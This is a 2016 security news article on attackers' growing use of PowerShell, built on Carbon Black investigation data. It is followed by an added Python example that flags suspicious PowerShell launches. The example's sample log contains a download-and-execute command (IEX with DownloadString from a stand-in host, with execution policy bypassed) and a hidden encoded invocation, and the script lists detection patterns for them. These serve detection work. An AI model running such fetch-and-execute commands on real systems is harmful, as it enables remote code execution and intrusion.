4/15/2016 03:14 PM
PowerShell Increasingly Being Used To Hide Malicious Activity

Data from 1,100 security investigations shows PowerShell was used in 38 percent of cyberattacks

Threat actors often try to take advantage of native tools in operating systems to conceal malicious activities.

One tool that appears to be a particular favorite in this regard is the PowerShell command shell and scripting language that Microsoft has included with its Windows operating system since 2009.

Security firm Carbon Black recently analyzed data from 1,100 investigations conducted by more than two dozen of its partners in 2015 to see how extensively PowerShell is being exploited in cyberattacks.

The data showed that in 38 percent of the investigated incidents, PowerShell was a part of the attack. Some 31 percent of the victim organizations said they had no idea that PowerShell had been exploited and discovered that fact only after calling in someone to investigate the security incident.

The most common malicious activity carried out via PowerShell was command and control communications. The data also showed that threat actors, trying to move laterally across a network after breaking into it first, often used PowerShell to conceal their movement. Credential theft and privilege escalation were some of the other common malicious activities enabled via PowerShell.

More than 85 percent of the attacks leveraging PowerShell were what Carbon Black described as commodity attacks, such as click fraud, ransomware, fake antivirus and other opportunistic threats. Many of these attacks appeared focused on stealing customer and financial data and intellectual property, or on disrupting services. About 13 percent of the attacks appeared targeted, according to Carbon Black.

PowerShell is commonly used to automate repetitive tasks and for system administration purposes. Administrators, for instance, often use it to access remote systems in order to query them and execute commands on them.

What makes it appealing to attackers is the opportunity it gives them to hide malicious activity, Carbon Black said in its report. PowerShell is a ubiquitous part of the Windows environment and is used far more for legitimate purposes than not. It therefore serves as a perfect foil for threat actors to hide their activities, the Carbon Black report noted.

“Its ability to dynamically load and execute code without touching the file system makes it especially difficult to secure,” the company warned.

As is common with many multi-stage attacks these days, PowerShell compromises usually begin with a separate initial compromise enabled through a phishing email or some other social engineering tactic. In a typical attack, a victim might receive a specially crafted Microsoft Office document as an email attachment or as a download via a link in the email. Opening the document usually results in the user being prompted to disable their macro security.

“Many enterprises make extensive use of macros in spreadsheets and Word documents,” says Rico Valdez, senior threat researcher at Carbon Black, in comments to Dark Reading. So a target might already be accustomed to disabling macro security to enable enhanced functionality in their documents, he said. “A well-crafted phish in which the target believes the document is coming from a trusted source might have the target believe the macros are legitimate.”

Enterprises need to be cognizant of the risks around PowerShell, Valdez says. What until relatively recently was considered a more sophisticated technique has entered the mainstream and is being used in all kinds of attacks, including commodity malware, he says. According to Carbon Black, the ready availability of toolkits such as PowerSploit, PowerShell Empire and p0wnedShell has also made it simple for threat actors to co-opt PowerShell in cyberattacks.

The trend heightens the need for organizations to set standards for PowerShell usage, for instance by allowing only signed scripts to execute.

Organizations should also consider capturing and monitoring PowerShell executions and storing the log data centrally so an attacker cannot tamper with it. Administrators can then set up alerts on key indicators in the log data, Valdez says. Blocking PowerShell altogether is another option, though that might not always be possible, he says.

“Profile and understand how PowerShell is used in your environment, and watch for or block use that does not meet that profile,” Valdez says. “PowerShell pulling down scripts from the Internet, being invoked with specific parameters, or being launched by users or processes that are not typical in your environment can go a long way toward identifying and stopping these attacks.”
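The monitoring and profiling advice above, worked through as an added Python example that is not from the article or from Carbon Black: it checks constructed process-creation records (a simplified pipe-delimited format, not a real Windows event export) against a baseline profile of which users and parent processes normally launch PowerShell, and flags the indicators Valdez names: downloads from the Internet, suspicious invocation parameters, and atypical launching users or processes. The parameter names are real PowerShell switches; the log lines, user names and profile contents are assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed sample records: timestamp|user|parent_process|command_line
# (a simplified format made up for this example, not a Windows event export).
SAMPLE_LOG = """\
2016-04-15 09:02:11|CORP\\admin01|explorer.exe|powershell.exe -File C:\\scripts\\inventory.ps1
2016-04-15 09:15:40|CORP\\jdoe|WINWORD.EXE|powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <base64-omitted>
2016-04-15 10:03:07|CORP\\svc_backup|taskeng.exe|powershell.exe -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
2016-04-15 10:20:55|CORP\\admin01|cmd.exe|powershell.exe -Command Get-Service
"""

# Assumed baseline profile of normal PowerShell use in this environment:
# the users and parent processes expected to launch it.
PROFILE = {
    "users": {"CORP\\admin01", "CORP\\svc_backup"},
    "parents": {"explorer.exe", "cmd.exe", "taskeng.exe"},
}

# Real PowerShell switches that rarely appear in routine administrative use.
SUSPICIOUS_PARAMS = ("-encodedcommand", "-executionpolicy bypass", "-windowstyle hidden")
# Command-line patterns indicating PowerShell pulling content from the Internet.
DOWNLOAD_PATTERNS = re.compile(r"downloadstring|downloadfile|invoke-webrequest|https?://", re.I)


@dataclass
class Alert:
    timestamp: str
    user: str
    reasons: list = field(default_factory=list)


def analyze(log_text, profile=PROFILE):
    """Return one Alert per record that deviates from the usage profile."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, parent, cmdline = line.split("|", 3)
        lowered = cmdline.lower()
        reasons = []
        if user not in profile["users"]:
            reasons.append(f"atypical user {user}")
        if parent.lower() not in profile["parents"]:
            reasons.append(f"atypical parent {parent}")
        if DOWNLOAD_PATTERNS.search(cmdline):
            reasons.append("downloads content from the Internet")
        hits = [p for p in SUSPICIOUS_PARAMS if p in lowered]
        if hits:
            reasons.append("suspicious parameters: " + ", ".join(hits))
        if reasons:
            alerts.append(Alert(ts, user, reasons))
    return alerts
```

Feeding the constructed log through `analyze` flags the Word-launched hidden encoded invocation and the bypass-plus-download one, while the two routine administrative runs pass silently.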


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ...

Comments

GeethaR978, User Rank: Apprentice, 4/16/2016 | 3:26:07 AM
informative
Very informative. Helps to gain knowledge about new information and concepts.